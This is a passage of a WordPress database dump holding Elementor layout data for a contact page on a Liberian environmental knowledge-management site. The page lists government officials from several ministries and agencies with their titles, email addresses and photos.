href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24522,3619,'_elementor_edit_mode','builder'),(24523,3619,'_elementor_template_type','wp-page'),(24524,3619,'_elementor_version','3.0.16'),(24525,3619,'_wp_page_template','default'),(24526,3619,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact 